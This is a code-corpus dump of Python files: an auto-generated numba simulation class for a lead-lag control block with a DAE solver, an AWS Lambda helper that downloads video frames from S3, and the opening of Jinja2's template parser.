sqrt = np.sqrt
sign = np.sign
class lead_lag_class:
def __init__(self):
self.t_end = 10.000000
self.Dt = 0.0010000
self.decimation = 10.000000
self.itol = 1e-6
self.Dt_max = 0.001000
self.Dt_min = 0.001000
self.solvern = 5
self.imax = 100
self.N_x = 1
self.N_y = 1
self.N_z = 1
self.N_store = 10000
self.params_list = ['T_1', 'T_2']
self.params_values_list = [2, 0.1]
self.inputs_ini_list = ['u_l']
self.inputs_ini_values_list = [0.0]
self.inputs_run_list = ['u_l']
self.inputs_run_values_list = [0.0]
self.outputs_list = ['u_l']
self.x_list = ['x_l']
self.y_run_list = ['z_l']
self.xy_list = self.x_list + self.y_run_list
self.y_ini_list = ['z_l']
self.xy_ini_list = self.x_list + self.y_ini_list
self.t = 0.0
self.it = 0
self.it_store = 0
self.xy_prev = np.zeros((self.N_x+self.N_y,1))
self.initialization_tol = 1e-6
self.N_u = len(self.inputs_run_list)
self.sopt_root_method='hybr'
self.sopt_root_jac=True
self.u_ini_list = self.inputs_ini_list
self.u_ini_values_list = self.inputs_ini_values_list
self.u_run_list = self.inputs_run_list
self.u_run_values_list = self.inputs_run_values_list
self.N_u = len(self.u_run_list)
Fx_ini_rows,Fx_ini_cols,Fy_ini_rows,Fy_ini_cols,Gx_ini_rows,Gx_ini_cols,Gy_ini_rows,Gy_ini_cols = nonzeros()
self.Fx_ini_rows = np.array(Fx_ini_rows)
if len(Fx_ini_rows) == 1:
self.Fx_ini_rows = np.array([[Fx_ini_rows]]).reshape(1,)
self.Fx_ini_cols = np.array([[Fx_ini_cols]]).reshape(1,)
self.Fx_ini_cols = np.array(Fx_ini_cols)
self.Fy_ini_rows = np.array(Fy_ini_rows)
self.Fy_ini_cols = np.array(Fy_ini_cols)
self.Gx_ini_rows = np.array(Gx_ini_rows)
self.Gx_ini_cols = np.array(Gx_ini_cols)
self.Gy_ini_rows = np.array(Gy_ini_rows)
self.Gy_ini_cols = np.array(Gy_ini_cols)
self.yini2urun = list(set(self.inputs_run_list).intersection(set(self.y_ini_list)))
self.uini2yrun = list(set(self.y_run_list).intersection(set(self.inputs_ini_list)))
self.update()
def update(self):
self.N_steps = int(np.ceil(self.t_end/self.Dt))
dt = [
('t_end', np.float64),
('Dt', np.float64),
('decimation', np.float64),
('itol', np.float64),
('Dt_max', np.float64),
('Dt_min', np.float64),
('solvern', np.int64),
('imax', np.int64),
('N_steps', np.int64),
('N_store', np.int64),
('N_x', np.int64),
('N_y', np.int64),
('N_z', np.int64),
('t', np.float64),
('it', np.int64),
('it_store', np.int64),
('idx', np.int64),
('idy', np.int64),
('f', np.float64, (self.N_x,1)),
('x', np.float64, (self.N_x,1)),
('x_0', np.float64, (self.N_x,1)),
('g', np.float64, (self.N_y,1)),
('y_run', np.float64, (self.N_y,1)),
('y_ini', np.float64, (self.N_y,1)),
('u_run', np.float64, (self.N_u,1)),
('y_0', np.float64, (self.N_y,1)),
('h', np.float64, (self.N_z,1)),
('Fx', np.float64, (self.N_x,self.N_x)),
('Fy', np.float64, (self.N_x,self.N_y)),
('Gx', np.float64, (self.N_y,self.N_x)),
('Gy', np.float64, (self.N_y,self.N_y)),
('Fu', np.float64, (self.N_x,self.N_u)),
('Gu', np.float64, (self.N_y,self.N_u)),
('Hx', np.float64, (self.N_z,self.N_x)),
('Hy', np.float64, (self.N_z,self.N_y)),
('Hu', np.float64, (self.N_z,self.N_u)),
('Fx_ini', np.float64, (self.N_x,self.N_x)),
('Fy_ini', np.float64, (self.N_x,self.N_y)),
('Gx_ini', np.float64, (self.N_y,self.N_x)),
('Gy_ini', np.float64, (self.N_y,self.N_y)),
('T', np.float64, (self.N_store+1,1)),
('X', np.float64, (self.N_store+1,self.N_x)),
('Y', np.float64, (self.N_store+1,self.N_y)),
('Z', np.float64, (self.N_store+1,self.N_z)),
('iters', np.float64, (self.N_store+1,1)),
('store', np.int64),
('Fx_ini_rows', np.int64, self.Fx_ini_rows.shape),
('Fx_ini_cols', np.int64, self.Fx_ini_cols.shape),
('Fy_ini_rows', np.int64, self.Fy_ini_rows.shape),
('Fy_ini_cols', np.int64, self.Fy_ini_cols.shape),
('Gx_ini_rows', np.int64, self.Gx_ini_rows.shape),
('Gx_ini_cols', np.int64, self.Gx_ini_cols.shape),
('Gy_ini_rows', np.int64, self.Gy_ini_rows.shape),
('Gy_ini_cols', np.int64, self.Gy_ini_cols.shape),
('Ac_ini', np.float64, ((self.N_x+self.N_y,self.N_x+self.N_y))),
('fg', np.float64, ((self.N_x+self.N_y,1))),
]
values = [
self.t_end,
self.Dt,
self.decimation,
self.itol,
self.Dt_max,
self.Dt_min,
self.solvern,
self.imax,
self.N_steps,
self.N_store,
self.N_x,
self.N_y,
self.N_z,
self.t,
self.it,
self.it_store,
0, # idx
0, # idy
np.zeros((self.N_x,1)), # f
np.zeros((self.N_x,1)), # x
np.zeros((self.N_x,1)), # x_0
np.zeros((self.N_y,1)), # g
np.zeros((self.N_y,1)), # y_run
np.zeros((self.N_y,1)), # y_ini
np.zeros((self.N_u,1)), # u_run
np.zeros((self.N_y,1)), # y_0
np.zeros((self.N_z,1)), # h
np.zeros((self.N_x,self.N_x)), # Fx
np.zeros((self.N_x,self.N_y)), # Fy
np.zeros((self.N_y,self.N_x)), # Gx
np.zeros((self.N_y,self.N_y)), # Fy
np.zeros((self.N_x,self.N_u)), # Fu
np.zeros((self.N_y,self.N_u)), # Gu
np.zeros((self.N_z,self.N_x)), # Hx
np.zeros((self.N_z,self.N_y)), # Hy
np.zeros((self.N_z,self.N_u)), # Hu
np.zeros((self.N_x,self.N_x)), # Fx_ini
np.zeros((self.N_x,self.N_y)), # Fy_ini
np.zeros((self.N_y,self.N_x)), # Gx_ini
np.zeros((self.N_y,self.N_y)), # Fy_ini
np.zeros((self.N_store+1,1)), # T
np.zeros((self.N_store+1,self.N_x)), # X
np.zeros((self.N_store+1,self.N_y)), # Y
np.zeros((self.N_store+1,self.N_z)), # Z
np.zeros((self.N_store+1,1)), # iters
1,
self.Fx_ini_rows,
self.Fx_ini_cols,
self.Fy_ini_rows,
self.Fy_ini_cols,
self.Gx_ini_rows,
self.Gx_ini_cols,
self.Gy_ini_rows,
self.Gy_ini_cols,
np.zeros((self.N_x+self.N_y,self.N_x+self.N_y)),
np.zeros((self.N_x+self.N_y,1)),
]
dt += [(item,np.float64) for item in self.params_list]
values += [item for item in self.params_values_list]
for item_id,item_val in zip(self.inputs_ini_list,self.inputs_ini_values_list):
if item_id in self.inputs_run_list: continue
dt += [(item_id,np.float64)]
values += [item_val]
dt += [(item,np.float64) for item in self.inputs_run_list]
values += [item for item in self.inputs_run_values_list]
self.struct = np.rec.array([tuple(values)], dtype=np.dtype(dt))
xy0 = np.zeros((self.N_x+self.N_y,))
self.ini_dae_jacobian_nn(xy0)
self.run_dae_jacobian_nn(xy0)
def load_params(self,data_input):
if type(data_input) == str:
json_file = data_input
self.json_file = json_file
self.json_data = open(json_file).read().replace("'",'"')
data = json.loads(self.json_data)
elif type(data_input) == dict:
data = data_input
self.data = data
for item in self.data:
self.struct[0][item] = self.data[item]
self.params_values_list[self.params_list.index(item)] = self.data[item]
def ini_problem(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_ini[:,0] = x[self.N_x:(self.N_x+self.N_y)]
if self.compile:
ini(self.struct,2)
ini(self.struct,3)
else:
ini.py_func(self.struct,2)
ini.py_func(self.struct,3)
fg = np.vstack((self.struct[0].f,self.struct[0].g))[:,0]
return fg
def run_problem(self,x):
t = self.struct[0].t
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_run[:,0] = x[self.N_x:(self.N_x+self.N_y)]
if self.compile:
run(t,self.struct,2)
run(t,self.struct,3)
run(t,self.struct,10)
run(t,self.struct,11)
run(t,self.struct,12)
run(t,self.struct,13)
else:
run.py_func(t,self.struct,2)
run.py_func(t,self.struct,3)
run.py_func(t,self.struct,10)
run.py_func(t,self.struct,11)
run.py_func(t,self.struct,12)
run.py_func(t,self.struct,13)
fg = np.vstack((self.struct[0].f,self.struct[0].g))[:,0]
return fg
def run_dae_jacobian(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_run[:,0] = x[self.N_x:(self.N_x+self.N_y)]
run(0.0,self.struct,10)
run(0.0,self.struct,11)
run(0.0,self.struct,12)
run(0.0,self.struct,13)
A_c = np.block([[self.struct[0].Fx,self.struct[0].Fy],
[self.struct[0].Gx,self.struct[0].Gy]])
return A_c
def run_dae_jacobian_nn(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_run[:,0] = x[self.N_x:(self.N_x+self.N_y)]
run_nn(0.0,self.struct,10)
run_nn(0.0,self.struct,11)
run_nn(0.0,self.struct,12)
run_nn(0.0,self.struct,13)
def eval_jacobians(self):
run(0.0,self.struct,10)
run(0.0,self.struct,11)
run(0.0,self.struct,12)
return 1
def ini_dae_jacobian(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_ini[:,0] = x[self.N_x:(self.N_x+self.N_y)]
if self.compile:
ini(self.struct,10)
ini(self.struct,11)
else:
ini.py_func(self.struct,10)
ini.py_func(self.struct,11)
A_c = np.block([[self.struct[0].Fx_ini,self.struct[0].Fy_ini],
[self.struct[0].Gx_ini,self.struct[0].Gy_ini]])
return A_c
def ini_dae_jacobian_nn(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_ini[:,0] = x[self.N_x:(self.N_x+self.N_y)]
ini_nn(self.struct,10)
ini_nn(self.struct,11)
def f_ode(self,x):
self.struct[0].x[:,0] = x
run(self.struct,1)
return self.struct[0].f[:,0]
def f_odeint(self,x,t):
self.struct[0].x[:,0] = x
run(self.struct,1)
return self.struct[0].f[:,0]
def f_ivp(self,t,x):
self.struct[0].x[:,0] = x
run(self.struct,1)
return self.struct[0].f[:,0]
def Fx_ode(self,x):
self.struct[0].x[:,0] = x
run(self.struct,10)
return self.struct[0].Fx
def eval_A(self):
Fx = self.struct[0].Fx
Fy = self.struct[0].Fy
Gx = self.struct[0].Gx
Gy = self.struct[0].Gy
A = Fx - Fy @ np.linalg.solve(Gy,Gx)
self.A = A
return A
def eval_A_ini(self):
Fx = self.struct[0].Fx_ini
Fy = self.struct[0].Fy_ini
Gx = self.struct[0].Gx_ini
Gy = self.struct[0].Gy_ini
A = Fx - Fy @ np.linalg.solve(Gy,Gx)
return A
def reset(self):
for param,param_value in zip(self.params_list,self.params_values_list):
self.struct[0][param] = param_value
for input_name,input_value in zip(self.inputs_ini_list,self.inputs_ini_values_list):
self.struct[0][input_name] = input_value
for input_name,input_value in zip(self.inputs_run_list,self.inputs_run_values_list):
self.struct[0][input_name] = input_value
def simulate(self,events,xy0=0):
# initialize both the ini and the run system
self.initialize(events,xy0=xy0)
# simulation run
for event in events:
# make all the desired changes
self.run([event])
# post process
T,X,Y,Z = self.post()
return T,X,Y,Z
def run(self,events):
# simulation run
for event in events:
# make all the desired changes
for item in event:
self.struct[0][item] = event[item]
daesolver(self.struct) # run until next event
return 1
def rtrun(self,events):
# simulation run
for event in events:
# make all the desired changes
for item in event:
self.struct[0][item] = event[item]
self.struct[0].it_store = self.struct[0].N_store-1
daesolver(self.struct) # run until next event
return 1
def post(self):
# post process result
T = self.struct[0]['T'][:self.struct[0].it_store]
X = self.struct[0]['X'][:self.struct[0].it_store,:]
Y = self.struct[0]['Y'][:self.struct[0].it_store,:]
Z = self.struct[0]['Z'][:self.struct[0].it_store,:]
iters = self.struct[0]['iters'][:self.struct[0].it_store,:]
self.T = T
self.X = X
self.Y = Y
self.Z = Z
self.iters = iters
return T,X,Y,Z
def save_0(self,file_name = 'xy_0.json'):
xy_0_dict = {}
for item in self.x_list:
xy_0_dict.update({item:self.get_value(item)})
for item in self.y_ini_list:
xy_0_dict.update({item:self.get_value(item)})
xy_0_str = json.dumps(xy_0_dict, indent=4)
with open(file_name,'w') as fobj:
fobj.write(xy_0_str)
def load_0(self,file_name = 'xy_0.json'):
with open(file_name) as fobj:
xy_0_str = fobj.read()
xy_0_dict = json.loads(xy_0_str)
for item in xy_0_dict:
if item in self.x_list:
self.xy_prev[self.x_list.index(item)] = xy_0_dict[item]
if item in self.y_ini_list:
self.xy_prev[self.y_ini_list.index(item)+self.N_x] = xy_0_dict[item]
def initialize(self,events=[{}],xy0=0,compile=True):
'''
Parameters
----------
events : dictionary
Dictionary with at least 't_end' and all inputs and parameters
that need to be changed.
xy0 : float or string, optional
0 means all states should be zero as initial guess.
If not zero all the states initial guess are the given input.
If 'prev' it uses the last known initialization result as initial guess.
Returns
-------
T : TYPE
DESCRIPTION.
X : TYPE
DESCRIPTION.
Y : TYPE
DESCRIPTION.
Z : TYPE
DESCRIPTION.
'''
self.compile = compile
# simulation parameters
self.struct[0].it = 0 # set time step to zero
self.struct[0].it_store = 0 # set storage to zero
self.struct[0].t = 0.0 # set time to zero
# initialization
it_event = 0
event = events[it_event]
for item in event:
self.struct[0][item] = event[item]
## compute initial conditions using x and y_ini
if type(xy0) == str:
if xy0 == 'prev':
xy0 = self.xy_prev
else:
self.load_0(xy0)
xy0 = self.xy_prev
elif type(xy0) == dict:
with open('xy_0.json','w') as fobj:
fobj.write(json.dumps(xy0))
self.load_0('xy_0.json')
xy0 = self.xy_prev
else:
if xy0 == 0:
xy0 = np.zeros(self.N_x+self.N_y)
elif xy0 == 1:
xy0 = np.ones(self.N_x+self.N_y)
else:
xy0 = xy0*np.ones(self.N_x+self.N_y)
#xy = sopt.fsolve(self.ini_problem,xy0, jac=self.ini_dae_jacobian )
if self.sopt_root_jac:
sol = sopt.root(self.ini_problem, xy0,
jac=self.ini_dae_jacobian,
method=self.sopt_root_method, tol=self.initialization_tol)
else:
sol = sopt.root(self.ini_problem, xy0, method=self.sopt_root_method)
self.initialization_ok = True
if sol.success == False:
print('initialization not found!')
self.initialization_ok = False
T = self.struct[0]['T'][:self.struct[0].it_store]
X = self.struct[0]['X'][:self.struct[0].it_store,:]
Y = self.struct[0]['Y'][:self.struct[0].it_store,:]
Z = self.struct[0]['Z'][:self.struct[0].it_store,:]
iters = self.struct[0]['iters'][:self.struct[0].it_store,:]
if self.initialization_ok:
xy = sol.x
self.xy_prev = xy
self.struct[0].x[:,0] = xy[0:self.N_x]
self.struct[0].y_run[:,0] = xy[self.N_x:]
## y_ini to u_run
for item in self.inputs_run_list:
if item in self.y_ini_list:
self.struct[0][item] = self.struct[0].y_ini[self.y_ini_list.index(item)]
## u_ini to y_run
for item in self.inputs_ini_list:
if item in self.y_run_list:
self.struct[0].y_run[self.y_run_list.index(item)] = self.struct[0][item]
#xy = sopt.fsolve(self.ini_problem,xy0, jac=self.ini_dae_jacobian )
if self.sopt_root_jac:
sol = sopt.root(self.run_problem, xy0,
jac=self.run_dae_jacobian,
method=self.sopt_root_method, tol=self.initialization_tol)
else:
sol = sopt.root(self.run_problem, xy0, method=self.sopt_root_method)
if self.compile:
# evaluate f and g
run(0.0,self.struct,2)
run(0.0,self.struct,3)
# evaluate run jacobians
run(0.0,self.struct,10)
run(0.0,self.struct,11)
run(0.0,self.struct,12)
run(0.0,self.struct,14)
else:
# evaluate f and g
run.py_func(0.0,self.struct,2)
run.py_func(0.0,self.struct,3)
# evaluate run jacobians
run.py_func(0.0,self.struct,10)
run.py_func(0.0,self.struct,11)
run.py_func(0.0,self.struct,12)
run.py_func(0.0,self.struct,14)
# post process result
T = self.struct[0]['T'][:self.struct[0].it_store]
X = self.struct[0]['X'][:self.struct[0].it_store,:]
Y = self.struct[0]['Y'][:self.struct[0].it_store,:]
Z = self.struct[0]['Z'][:self.struct[0].it_store,:]
iters = self.struct[0]['iters'][:self.struct[0].it_store,:]
self.T = T
self.X = X
self.Y = Y
self.Z = Z
self.iters = iters
return self.initialization_ok
def get_value(self,name):
if name in self.inputs_run_list:
value = self.struct[0][name]
if name in self.x_list:
idx = self.x_list.index(name)
value = self.struct[0].x[idx,0]
if name in self.y_run_list:
idy = self.y_run_list.index(name)
value = self.struct[0].y_run[idy,0]
if name in self.params_list:
value = self.struct[0][name]
if name in self.outputs_list:
value = self.struct[0].h[self.outputs_list.index(name),0]
return value
def get_values(self,name):
if name in self.x_list:
values = self.X[:,self.x_list.index(name)]
if name in self.y_run_list:
values = self.Y[:,self.y_run_list.index(name)]
if name in self.outputs_list:
values = self.Z[:,self.outputs_list.index(name)]
return values
def get_mvalue(self,names):
'''
Parameters
----------
names : list
list of variables names to return each value.
Returns
-------
mvalue : TYPE
list of value of each variable.
'''
mvalue = []
for name in names:
mvalue += [self.get_value(name)]
return mvalue
def set_value(self,name_,value):
if name_ in self.inputs_run_list:
self.struct[0][name_] = value
return
elif name_ in self.params_list:
self.struct[0][name_] = value
return
elif name_ in self.inputs_ini_list:
self.struct[0][name_] = value
return
else:
print(f'Input or parameter {name_} not found.')
def set_values(self,dictionary):
for item in dictionary:
self.set_value(item,dictionary[item])
def report_x(self,value_format='5.2f', decimals=2):
for item in self.x_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_y(self,value_format='5.2f', decimals=2):
for item in self.y_run_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_u(self,value_format='5.2f', decimals=2):
for item in self.inputs_run_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_z(self,value_format='5.2f', decimals=2):
for item in self.outputs_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_params(self,value_format='5.2f', decimals=2):
for item in self.params_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def get_x(self):
return self.struct[0].x
def ss(self):
ssate(self.struct,self.xy_prev.reshape(len(self.xy_prev),1))
## y_ini to y_run
self.struct[0].y_run = self.struct[0].y_ini
## y_ini to u_run
for item in self.yini2urun:
self.struct[0][item] = self.struct[0].y_ini[self.y_ini_list.index(item)]
## u_ini to y_run
for item in self.uini2yrun:
self.struct[0].y_run[self.y_run_list.index(item)] = self.struct[0][item]
@numba.njit(cache=True)
def ini(struct,mode):
# Parameters:
T_1 = struct[0].T_1
T_2 = struct[0].T_2
# Inputs:
u_l = struct[0].u_l
# Dynamical states:
x_l = struct[0].x[0,0]
# Algebraic states:
z_l = struct[0].y_ini[0,0]
# Differential equations:
if mode == 2:
struct[0].f[0,0] = (u_l - x_l)/T_2
# Algebraic equations:
if mode == 3:
struct[0].g[:,:] = np.ascontiguousarray(struct[0].Gy_ini) @ np.ascontiguousarray(struct[0].y_ini)
struct[0].g[0,0] = T_1*(u_l - x_l)/T_2 + x_l - z_l
# Outputs:
if mode == 3:
struct[0].h[0,0] = u_l
if mode == 10:
struct[0].Fx_ini[0,0] = -1/T_2
if mode == 11:
struct[0].Gx_ini[0,0] = -T_1/T_2 + 1
pass
@numba.njit(cache=True)
def run(t,struct,mode):
# Parameters:
T_1 = struct[0].T_1
T_2 = struct[0].T_2
# Inputs:
u_l = struct[0].u_l
# Dynamical states:
x_l = struct[0].x[0,0]
# Algebraic states:
z_l = struct[0].y_run[0,0]
struct[0].u_run[0,0] = u_l
# Differential equations:
if mode == 2:
struct[0].f[0,0] = (u_l - x_l)/T_2
# Algebraic equations:
if mode == 3:
struct[0].g[:,:] = np.ascontiguousarray(struct[0].Gy) @ np.ascontiguousarray(struct[0].y_run) + np.ascontiguousarray(struct[0].Gu) @ np.ascontiguousarray(struct[0].u_run)
struct[0].g[0,0] = T_1*(u_l - x_l)/T_2 + x_l - z_l
# Outputs:
if mode == 3:
struct[0].h[0,0] = u_l
if mode == 10:
struct[0].Fx[0,0] = -1/T_2
if mode == 11:
struct[0].Gx[0,0] = -T_1/T_2 + 1
if mode > 12:
pass
def ini_nn(struct,mode):
# Parameters:
T_1 = struct[0].T_1
T_2 = struct[0].T_2
# Inputs:
u_l = struct[0].u_l
# Dynamical states:
x_l = struct[0].x[0,0]
# Algebraic states:
z_l = struct[0].y_ini[0,0]
# Differential equations:
if mode == 2:
struct[0].f[0,0] = (u_l - x_l)/T_2
# Algebraic equations:
if mode == 3:
struct[0].g[0,0] = T_1*(u_l - x_l)/T_2 + x_l - z_l
# Outputs:
if mode == 3:
struct[0].h[0,0] = u_l
if mode == 10:
struct[0].Fx_ini[0,0] = -1/T_2
if mode == 11:
struct[0].Gy_ini[0,0] = -1
def run_nn(t,struct,mode):
# Parameters:
T_1 = struct[0].T_1
T_2 = struct[0].T_2
# Inputs:
u_l = struct[0].u_l
# Dynamical states:
x_l = struct[0].x[0,0]
# Algebraic states:
z_l = struct[0].y_run[0,0]
# Differential equations:
if mode == 2:
struct[0].f[0,0] = (u_l - x_l)/T_2
# Algebraic equations:
if mode == 3:
struct[0].g[0,0] = T_1*(u_l - x_l)/T_2 + x_l - z_l
# Outputs:
if mode == 3:
struct[0].h[0,0] = u_l
if mode == 10:
struct[0].Fx[0,0] = -1/T_2
if mode == 11:
struct[0].Gy[0,0] = -1
@numba.njit(cache=True)
def Piecewise(arg):
out = arg[0][1]
N = len(arg)
for it in range(N-1,-1,-1):
if arg[it][1]: out = arg[it][0]
return out
@numba.njit(cache=True)
def ITE(arg):
out = arg[0][1]
N = len(arg)
for it in range(N-1,-1,-1):
if arg[it][1]: out = arg[it][0]
return out
@numba.njit(cache=True)
def Abs(x):
return np.abs(x)
@numba.njit(cache=True)
def ini_dae_jacobian_numba(struct,x):
N_x = struct[0].N_x
N_y = struct[0].N_y
struct[0].x[:,0] = x[0:N_x]
struct[0].y_ini[:,0] = x[N_x:(N_x+N_y)]
ini(struct,10)
ini(struct,11)
for row,col in zip(struct[0].Fx_ini_rows,struct[0].Fx_ini_cols):
struct[0].Ac_ini[row,col] = struct[0].Fx_ini[row,col]
for row,col in zip(struct[0].Fy_ini_rows,struct[0].Fy_ini_cols):
struct[0].Ac_ini[row,col+N_x] = struct[0].Fy_ini[row,col]
for row,col in zip(struct[0].Gx_ini_rows,struct[0].Gx_ini_cols):
struct[0].Ac_ini[row+N_x,col] = struct[0].Gx_ini[row,col]
for row,col in zip(struct[0].Gy_ini_rows,struct[0].Gy_ini_cols):
struct[0].Ac_ini[row+N_x,col+N_x] = struct[0].Gy_ini[row,col]
@numba.njit(cache=True)
def ini_dae_problem(struct,x):
N_x = struct[0].N_x
N_y = struct[0].N_y
struct[0].x[:,0] = x[0:N_x]
struct[0].y_ini[:,0] = x[N_x:(N_x+N_y)]
ini(struct,2)
ini(struct,3)
struct[0].fg[:N_x,:] = struct[0].f[:]
struct[0].fg[N_x:,:] = struct[0].g[:]
@numba.njit(cache=True)
def ssate(struct,xy):
for it in range(100):
ini_dae_jacobian_numba(struct,xy[:,0])
ini_dae_problem(struct,xy[:,0])
xy[:] += np.linalg.solve(struct[0].Ac_ini,-struct[0].fg)
if np.max(np.abs(struct[0].fg[:,0]))<1e-8: break
N_x = struct[0].N_x
struct[0].x[:,0] = xy[:N_x,0]
struct[0].y_ini[:,0] = xy[N_x:,0]
return xy,it
@numba.njit(cache=True)
def daesolver(struct):
sin = np.sin
cos = np.cos
sqrt = np.sqrt
i = 0
Dt = struct[i].Dt
N_x = struct[i].N_x
N_y = struct[i].N_y
N_z = struct[i].N_z
decimation = struct[i].decimation
eye = np.eye(N_x)
t = struct[i].t
t_end = struct[i].t_end
if struct[i].it == 0:
run(t,struct, 1)
struct[i].it_store = 0
struct[i]['T'][0] = t
struct[i].X[0,:] = struct[i].x[:,0]
struct[i].Y[0,:] = struct[i].y_run[:,0]
struct[i].Z[0,:] = struct[i].h[:,0]
solver = struct[i].solvern
while t<t_end:
struct[i].it += 1
struct[i].t += Dt
t = struct[i].t
if solver == 5: # Teapezoidal DAE as in Milano's book
run(t,struct, 2)
run(t,struct, 3)
x = np.copy(struct[i].x[:])
y = np.copy(struct[i].y_run[:])
f = np.copy(struct[i].f[:])
g = np.copy(struct[i].g[:])
for iter in range(struct[i].imax):
run(t,struct, 2)
run(t,struct, 3)
run(t,struct,10)
run(t,struct,11)
x_i = struct[i].x[:]
y_i = struct[i].y_run[:]
f_i = struct[i].f[:]
g_i = struct[i].g[:]
F_x_i = struct[i].Fx[:,:]
F_y_i = struct[i].Fy[:,:]
G_x_i = struct[i].Gx[:,:]
G_y_i = struct[i].Gy[:,:]
A_c_i = np.vstack((np.hstack((eye-0.5*Dt*F_x_i, -0.5*Dt*F_y_i)),
np.hstack((G_x_i, G_y_i))))
f_n_i = x_i - x - 0.5*Dt*(f_i+f)
# print(t,iter,g_i)
Dxy_i = np.linalg.solve(-A_c_i,np.vstack((f_n_i,g_i)))
x_i = x_i + Dxy_i[0:N_x]
y_i = y_i + Dxy_i[N_x:(N_x+N_y)]
struct[i].x[:] = x_i
struct[i].y_run[:] = y_i
# [f_i,g_i,F_x_i,F_y_i,G_x_i,G_y_i] = smib_transient(x_i,y_i,u);
# A_c_i = [[eye(N_x)-0.5*Dt*F_x_i, -0.5*Dt*F_y_i],
# [ G_x_i, G_y_i]];
# f_n_i = x_i - x - 0.5*Dt*(f_i+f);
# Dxy_i = -A_c_i\[f_n_i.',g_i.'].';
# x_i = x_i + Dxy_i(1:N_x);
# y_i = y_i + Dxy_i(N_x+1:N_x+N_y);
xy = np.vstack((x_i,y_i))
max_relative = 0.0
for it_var in range(N_x+N_y):
abs_value = np.abs(xy[it_var,0])
if abs_value < 0.001:
abs_value = 0.001
relative_error = np.abs(Dxy_i[it_var,0])/abs_value
if relative_error > max_relative: max_relative = relative_error
if max_relative<struct[i].itol:
break
# if iter>struct[i].imax-2:
# print('Convergence problem')
struct[i].x[:] = x_i
struct[i].y_run[:] = y_i
# channels
if struct[i].store == 1:
it_store = struct[i].it_store
if struct[i].it >= it_store*decimation:
struct[i]['T'][it_store+1] = t
struct[i].X[it_store+1,:] = struct[i].x[:,0]
struct[i].Y[it_store+1,:] = struct[i].y_run[:,0]
struct[i].Z[it_store+1,:] = struct[i].h[:,0]
struct[i].iters[it_store+1,0] = iter
struct[i].it_store += 1
struct[i].t = t
return t
def nonzeros():
Fx_ini_rows = [0]
Fx_ini_cols = [0]
Fy_ini_rows = []
Fy_ini_cols = []
Gx_ini_rows = [0]
Gx_ini_cols = [0]
Gy_ini_rows = [0]
Gy_ini_cols = [0]
return Fx_ini_rows,Fx_ini_cols,Fy_ini_rows,Fy_ini_cols,Gx_ini_rows,Gx_ini_cols,Gy_ini_rows,Gy_ini_cols | 30.353047 | 178 | 0.491852 |
912db262ad6b5c5ed6f01fc7bf0894969fb374bc | 932 | py | Python | src/lambda/ppe-detector-function/main/utils/frame_downloader.py | gai6948/video-analytics-for-ppe-compliance | bb41ac010f5917bd7e85adfed689489f24830617 | [
"Apache-2.0"
] | null | null | null | src/lambda/ppe-detector-function/main/utils/frame_downloader.py | gai6948/video-analytics-for-ppe-compliance | bb41ac010f5917bd7e85adfed689489f24830617 | [
"Apache-2.0"
] | null | null | null | src/lambda/ppe-detector-function/main/utils/frame_downloader.py | gai6948/video-analytics-for-ppe-compliance | bb41ac010f5917bd7e85adfed689489f24830617 | [
"Apache-2.0"
] | null | null | null | from typing import Any, Tuple, Dict
import boto3
import timeit
from aws_lambda_powertools.logging import Logger
from aws_lambda_powertools.tracing import Tracer
logger = Logger(service='face-detector', child=True)
tracer = Tracer(service='face-detector')
@tracer.capture_method(capture_response=False)
def download_frame(bucket_name: str, key: str, s3_client: None) -> Tuple[bytes, Dict[str, str]]:
start_time = timeit.default_timer()
if s3_client == None:
s3_client = boto3.client('s3')
try:
resp = s3_client.get_object(
Bucket=bucket_name,
Key=key
)
frame_data = resp["Body"].read()
metadata = resp["Metadata"]
logger.info(
f'Frame downloaded from S3 completed after: {timeit.default_timer() - start_time}')
return frame_data, metadata
except(Exception):
logger.exception("Error downloading frame from S3")
| 30.064516 | 96 | 0.680258 |
7403b0864e2bdbdf23d83ab3a6d029d1743de893 | 36,060 | py | Python | jinja2/parser.py | captainmalloc/jinja | 540b260198285f0ed41fbe80c0b1b6f13be579c1 | [
"BSD-3-Clause"
] | 1 | 2020-07-06T05:53:18.000Z | 2020-07-06T05:53:18.000Z | jinja2/parser.py | captainmalloc/jinja | 540b260198285f0ed41fbe80c0b1b6f13be579c1 | [
"BSD-3-Clause"
] | null | null | null | jinja2/parser.py | captainmalloc/jinja | 540b260198285f0ed41fbe80c0b1b6f13be579c1 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
jinja2.parser
~~~~~~~~~~~~~
Implements the template parser.
:copyright: (c) 2017 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
from jinja2 import nodes
from jinja2.exceptions import TemplateSyntaxError, TemplateAssertionError
from jinja2.lexer import describe_token, describe_token_expr
from jinja2._compat import imap
_statement_keywords = frozenset(['for', 'if', 'block', 'extends', 'print',
'macro', 'include', 'from', 'import',
'set', 'with', 'autoescape'])
_compare_operators = frozenset(['eq', 'ne', 'lt', 'lteq', 'gt', 'gteq'])
_math_nodes = {
'add': nodes.Add,
'sub': nodes.Sub,
'mul': nodes.Mul,
'div': nodes.Div,
'floordiv': nodes.FloorDiv,
'mod': nodes.Mod,
}
class Parser(object):
"""This is the central parsing class Jinja uses. It's passed to
extensions and can be used to parse expressions or statements.
"""
def __init__(self, environment, source, name=None, filename=None,
state=None):
self.environment = environment
self.stream = environment._tokenize(source, name, filename, state)
self.name = name
self.filename = filename
self.closed = False
self.extensions = {}
for extension in environment.iter_extensions():
for tag in extension.tags:
self.extensions[tag] = extension.parse
self._last_identifier = 0
self._tag_stack = []
self._end_token_stack = []
def fail(self, msg, lineno=None, exc=TemplateSyntaxError):
"""Convenience method that raises `exc` with the message, passed
line number or last line number as well as the current name and
filename.
"""
if lineno is None:
lineno = self.stream.current.lineno
raise exc(msg, lineno, self.name, self.filename)
